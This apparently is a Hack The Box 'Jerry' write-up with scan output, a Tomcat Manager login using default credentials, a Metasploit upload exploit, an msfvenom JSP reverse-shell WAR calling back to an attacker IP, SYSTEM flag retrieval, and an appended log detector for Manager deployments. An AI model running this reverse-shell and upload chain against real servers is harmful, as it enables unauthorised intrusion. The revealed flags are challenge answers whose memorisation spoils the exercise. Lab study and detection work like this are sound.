HTB Jerry

$nmap -A -T4 -p- -sV -Pn 10.10.10.95

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 19:07 CEST
Nmap scan report for 10.10.10.95
Host is up (0.043s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.29 seconds

$gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.95:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/06/28 12:43:43 Starting gobuster
===============================================================
http://10.10.10.95:8080/aux (Status: 200)
http://10.10.10.95:8080/cmd (Status: 302)
http://10.10.10.95:8080/com1 (Status: 200)
http://10.10.10.95:8080/com2 (Status: 200)
http://10.10.10.95:8080/com3 (Status: 200)
http://10.10.10.95:8080/con (Status: 200)
http://10.10.10.95:8080/docs (Status: 302)
http://10.10.10.95:8080/examples (Status: 302)
http://10.10.10.95:8080/favicon.ico (Status: 200)
http://10.10.10.95:8080/host-manager (Status: 302)
http://10.10.10.95:8080/lpt2 (Status: 200)
http://10.10.10.95:8080/lpt1 (Status: 200)
http://10.10.10.95:8080/manager (Status: 302)
http://10.10.10.95:8080/nul (Status: 200)
http://10.10.10.95:8080/prn (Status: 200)
http://10.10.10.95:8080/shell (Status: 302)
===============================================================
2020/06/28 12:44:04 Finished
===============================================================

$nikto -h 10.10.10.95:8080

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.95
+ Target Hostname:    10.10.10.95
+ Target Port:        8080
+ Start Time:         2020-06-28 12:45:28 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7967 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2020-06-28 12:51:58 (GMT2) (390 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Access http://10.10.10.95:8080/manager/html

Log in with the credentials found in Nikto's results (tomcat/s3cret).

As we can observe, the Manager application lets us upload and deploy a WAR file.

msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret

HttpPassword => s3cret

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat

HttpUsername => tomcat

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95

rhost => 10.10.10.95

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080

rport => 8080

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit 

[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying SgSC1ks...
[*] Executing SgSC1ks...
[*] Undeploying SgSC1ks ...
[*] Sending stage (53904 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.95:49193) at 2020-06-28 16:52:32 +0200

meterpreter >

meterpreter > sysinfo

Computer    : JERRY
OS          : Windows Server 2012 R2 6.3 (amd64)
Meterpreter : java/windows

meterpreter > run post/multi/recon/local_exploit_suggester 

[*] 10.10.10.95 - Collecting local exploits for java/windows...
[-] 10.10.10.95 - No suggestions available.
meterpreter >

Let’s try another approach.

$msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.6 lport=9999 -f war -o shell.war

Payload size: 1097 bytes
Final size of war file: 1097 bytes
Saved as: shell.war
The WAR file was uploaded and deployed through the Manager application.

Access http://10.10.10.95:8080/reverse

C:\apache-tomcat-7.0.88>whoami

whoami
nt authority\system

C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is FC2B-E489

Directory of C:\Users\Administrator\Desktop

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  27,600,789,504 bytes free

C:\Users\Administrator\Desktop>cd flags
C:\Users\Administrator\Desktop\flags>dir

Volume in drive C has no label.
Volume Serial Number is FC2B-E489

Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,600,789,504 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"

user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
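Both approaches above go through the Manager application, so the defender's view of this box is the Tomcat access log. The following is an added example, not part of the original writeup: it parses access-log lines in Tomcat's default AccessLogValve format and flags successful Manager upload/deploy/undeploy operations, including the upload-then-undeploy sequence that the tomcat_mgr_upload module leaves behind. The log lines are constructed for the example (the SgSC1ks context name is the one from the Metasploit run above).

```python
import re

# Constructed sample in Tomcat's default AccessLogValve format ("%h %l %u %t "%r" %s %b");
# these lines are illustrative and were not captured from the machine.
SAMPLE_LOG = """\
10.10.14.6 - - [28/Jun/2020:16:52:30 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.6 - tomcat [28/Jun/2020:16:52:30 +0200] "GET /manager/html HTTP/1.1" 200 13245
10.10.14.6 - tomcat [28/Jun/2020:16:52:31 +0200] "POST /manager/html/upload HTTP/1.1" 200 13301
10.10.14.6 - - [28/Jun/2020:16:52:31 +0200] "GET /SgSC1ks/ HTTP/1.1" 200 0
10.10.14.6 - tomcat [28/Jun/2020:16:52:32 +0200] "POST /manager/html/undeploy?path=/SgSC1ks HTTP/1.1" 200 13287
10.10.14.7 - - [28/Jun/2020:16:55:00 +0200] "GET /examples/servlets/index.html HTTP/1.1" 200 6518
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?[^ "]*)? [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager operations that change which code the server runs.
MANAGER_OP_RE = re.compile(r'^/manager/(?:html|text)/(upload|deploy|undeploy|reload)$')


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_manager_activity(log_text):
    """Flag successful Manager deploy/undeploy operations and, per client, the
    upload -> undeploy sequence produced by the tomcat_mgr_upload module."""
    findings = []
    ops_by_host = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != "200":
            continue
        m = MANAGER_OP_RE.match(rec["path"])
        if not m:
            continue
        op = m.group(1)
        findings.append({"host": rec["host"], "user": rec["user"], "op": op, "time": rec["time"]})
        ops_by_host.setdefault(rec["host"], []).append(op)
    for host, ops in ops_by_host.items():
        # An upload/deploy immediately followed by an undeploy from the same client
        # is the drop-execute-remove pattern, not routine administration.
        if any(a in ("upload", "deploy") and b == "undeploy" for a, b in zip(ops, ops[1:])):
            findings.append({"host": host, "user": None, "op": "deploy-then-undeploy", "time": None})
    return findings
```

Run it against the real access log (logs/localhost_access_log.*.txt under the Tomcat directory) instead of SAMPLE_LOG; the manually deployed shell.war from the second approach shows up as the same upload operation, just without the undeploy.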
